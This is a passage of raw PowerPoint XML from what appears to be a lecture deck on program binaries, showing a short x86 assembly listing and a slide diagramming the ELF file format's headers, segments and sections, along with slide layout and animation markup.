              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  call </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> $0x0,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%eax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  leave</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  ret</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="136379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6">
                                            <p:txEl>
                                              <p:pRg st="17" end="17"/>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6">
                                            <p:txEl>
                                              <p:pRg st="18" end="18"/>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6">
                                            <p:txEl>
                                              <p:pRg st="19" end="19"/>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6">
                                            <p:txEl>
                                              <p:pRg st="20" end="20"/>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6">
                                            <p:txEl>
                                              <p:pRg st="21" end="21"/>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6">
                                            <p:txEl>
                                              <p:pRg st="22" end="22"/>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0" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>The ELF File Format</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="995331" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2590800" y="2400300"/>
            <a:ext cx="1676400" cy="57150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r>
              <a:rPr lang="en-US" sz="1400">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Header</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="995332" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2590800" y="2971800"/>
            <a:ext cx="1676400" cy="80010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r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Program</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Header </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Table</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="995333" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2590800" y="3771900"/>
            <a:ext cx="1676400" cy="57150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r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Segment</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="995335" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="2171700"/>
            <a:ext cx="1676400" cy="1714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r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Magic number</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="995336" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="2343150"/>
            <a:ext cx="1676400" cy="1714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r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Addressing info</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="995337" name="Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="2514600"/>
            <a:ext cx="1676400" cy="1714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r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>File type</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="995338" name="Rectangle 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="2686050"/>
            <a:ext cx="1676400" cy="1714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r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Arch type</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="995339" name="Rectangle 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="2857500"/>
            <a:ext cx="1676400" cy="1714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r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Entry point</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="995340" name="Rectangle 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="3028950"/>
            <a:ext cx="1676400" cy="1714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r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Program header </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>pos</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="995341" name="Rectangle 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="3200400"/>
            <a:ext cx="1676400" cy="1714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r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Section header </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>pos</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="995342" name="Rectangle 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="3371850"/>
            <a:ext cx="1676400" cy="1714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r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Header size</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="995343" name="Line 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2057400" y="2171700"/>
            <a:ext cx="457200" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="995344" name="Line 16"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="2057400" y="2971800"/>
            <a:ext cx="457200" cy="1371600"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="995345" name="Rectangle 17"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2590800" y="4343400"/>
            <a:ext cx="1676400" cy="57150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endParaRPr lang="en-US" sz="1400">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="995346" name="Rectangle 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2590800" y="5086350"/>
            <a:ext cx="1676400" cy="6286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r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Section </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Header </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Table</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="995347" name="Text Box 19"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3200400" y="4651284"/>
            <a:ext cx="319318" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="995348" name="Rectangle 20"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="3543300"/>
            <a:ext cx="1676400" cy="4000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r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Size and number of </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>entries in program header</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="995349" name="Rectangle 21"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="3943350"/>
            <a:ext cx="1676400" cy="4000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r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Size and number of </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>entries in section header</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="995393" name="Rectangle 65"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2590800" y="4343400"/>
            <a:ext cx="1676400" cy="22860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r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Section</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="995394" name="Rectangle 66"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2590800" y="4572000"/>
            <a:ext cx="1676400" cy="22860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r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Section</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="995398" name="Text Box 70"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A program is seen as a </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>collection of segments by </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>the loader and as a </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>collection of sections by the </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>compiler/linker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A segment is usually made </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>of several sections</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The segment structure is defined in the Program Header Table</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The section structure is defined in the Section Header Table</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="159384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53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53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953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9539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9539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953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953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95398">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95398">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95398">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95398">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9533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9533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9533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953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9533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99534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9534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99534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99534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9953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5331" grpId="0" animBg="1"/>
      <p:bldP spid="995332" grpId="0" animBg="1"/>
      <p:bldP spid="995333" grpId="0" animBg="1"/>
      <p:bldP spid="995335" grpId="0" animBg="1"/>
      <p:bldP spid="995336" grpId="0" animBg="1"/>
      <p:bldP spid="995337" grpId="0" animBg="1"/>
      <p:bldP spid="995338" grpId="0" animBg="1"/>
      <p:bldP spid="995339" grpId="0" animBg="1"/>
      <p:bldP spid="995340" grpId="0" animBg="1"/>
      <p:bldP spid="995341" grpId="0" animBg="1"/>
      <p:bldP spid="995342" grpId="0" animBg="1"/>
      <p:bldP spid="995346" grpId="0" animBg="1"/>
      <p:bldP spid="995347" grpId="0"/>
      <p:bldP spid="995348" grpId="0" animBg="1"/>
      <p:bldP spid="995349" grpId="0" animBg="1"/>
      <p:bldP spid="995393" grpId="0" animBg="1"/>
      <p:bldP spid="995394"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150</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="77571" y="261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graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="11" name="Table 10"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="143449" y="4851498"/>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0xfd2d4</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0xfd2e0</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0x804840e</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8" name="Right Arrow 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4530468" y="357945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Rectangle 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1999962" y="5312720"/>
            <a:ext cx="1652954"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999962" y="6055602"/>
            <a:ext cx="1652954"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999962" y="5633796"/>
            <a:ext cx="1652954"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07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
                                            <p:txEl>
                                              <p:pRg st="17" end="1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7">
                                            <p:txEl>
                                              <p:pRg st="18" end="18"/>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
                                            <p:txEl>
                                              <p:pRg st="19" end="19"/>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7">
                                            <p:txEl>
                                              <p:pRg st="20" end="2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7">
                                            <p:txEl>
                                              <p:pRg st="21" end="21"/>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7">
                                            <p:txEl>
                                              <p:pRg st="22" end="22"/>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7">
                                            <p:txEl>
                                              <p:pRg st="24" end="24"/>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7">
                                            <p:txEl>
                                              <p:pRg st="25" end="25"/>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7">
                                            <p:txEl>
                                              <p:pRg st="26" end="26"/>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7">
                                            <p:txEl>
                                              <p:pRg st="27" end="27"/>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7">
                                            <p:txEl>
                                              <p:pRg st="28" end="28"/>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7">
                                            <p:txEl>
                                              <p:pRg st="29" end="29"/>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7">
                                            <p:txEl>
                                              <p:pRg st="30" end="30"/>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7">
                                            <p:txEl>
                                              <p:pRg st="31" end="31"/>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7">
                                            <p:txEl>
                                              <p:pRg st="32" end="32"/>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7">
                                            <p:txEl>
                                              <p:pRg st="33" end="33"/>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7">
                                            <p:txEl>
                                              <p:pRg st="35" end="35"/>
                                            </p:txEl>
                                          </p:spTgt>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7">
                                            <p:txEl>
                                              <p:pRg st="36" end="36"/>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7">
                                            <p:txEl>
                                              <p:pRg st="37" end="37"/>
                                            </p:txEl>
                                          </p:spTgt>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7">
                                            <p:txEl>
                                              <p:pRg st="38" end="38"/>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7">
                                            <p:txEl>
                                              <p:pRg st="39" end="39"/>
                                            </p:txEl>
                                          </p:spTgt>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7">
                                            <p:txEl>
                                              <p:pRg st="40" end="40"/>
                                            </p:txEl>
                                          </p:spTgt>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7">
                                            <p:txEl>
                                              <p:pRg st="41" end="41"/>
                                            </p:txEl>
                                          </p:spTgt>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7">
                                            <p:txEl>
                                              <p:pRg st="42" end="42"/>
                                            </p:txEl>
                                          </p:spTgt>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7">
                                            <p:txEl>
                                              <p:pRg st="43" end="43"/>
                                            </p:txEl>
                                          </p:spTgt>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7">
                                            <p:txEl>
                                              <p:pRg st="44" end="44"/>
                                            </p:txEl>
                                          </p:spTgt>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7">
                                            <p:txEl>
